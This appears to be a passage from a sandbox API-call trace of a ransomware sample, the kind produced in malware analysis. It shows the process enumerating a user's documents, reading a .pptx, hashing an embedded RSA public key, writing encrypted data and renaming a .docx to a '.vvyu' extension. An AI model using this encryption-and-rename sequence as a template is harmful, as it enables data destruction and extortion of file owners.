hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.701] GetCurrentThreadId () returned 0x66c [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f4a0 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.701] GetCurrentThreadId () returned 0x66c [0193.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x669ac0 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6573d8 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657228 [0193.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea1a68 [0193.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea1c78 [0193.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0193.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea1e90 [0193.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1c78 | out: hHeap=0x620000) returned 1 [0193.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e90 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a80 | out: hHeap=0x620000) returned 1 [0193.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.713] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x9125, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x9125, lpOverlapped=0x0) returned 1 [0193.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.714] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x912a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.714] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea1a68 [0193.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea1a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea1e98 [0193.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.716] WriteFile (in: hFile=0x568, lpBuffer=0x2ea1e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea1e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1e98 | out: hHeap=0x620000) returned 1 [0193.716] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.716] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.716] CloseHandle (hObject=0x568) returned 1 [0193.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea1a68 [0193.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.718] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\DygX.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dygx.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\DygX.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\dygx.docx.vvyu")) returned 1 [0193.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.720] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.723] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e06ff0, ftCreationTime.dwHighDateTime=0x1d82486, ftLastAccessTime.dwLowDateTime=0xba0990a0, ftLastAccessTime.dwHighDateTime=0x1d8898e, ftLastWriteTime.dwLowDateTime=0xba0990a0, ftLastWriteTime.dwHighDateTime=0x1d8898e, nFileSizeHigh=0x0, nFileSizeLow=0x15ba2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HbBtrfj.pptx", cAlternateFileName="HBBTRF~1.PPT")) returned 1 [0193.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0a80 [0193.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a80 | out: hHeap=0x620000) returned 1 [0193.724] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\HbBtrfj.pptx") returned=".pptx" [0193.724] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\HbBtrfj.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\hbbtrfj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.725] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=88994) returned 1 [0193.725] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.728] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x15b7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.728] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.730] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.730] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.730] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x15ba2, lpOverlapped=0x0) returned 1 [0193.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.731] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.732] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.732] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.732] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.732] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.732] GetLastError () returned 0x0 [0193.732] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.732] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.732] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.732] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.732] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.732] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x15ba0) returned 0x2ea79b0 [0193.733] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.733] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0a80 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ac8 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x669ac0 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.734] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1a68 [0193.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6572d0 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657210 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.735] 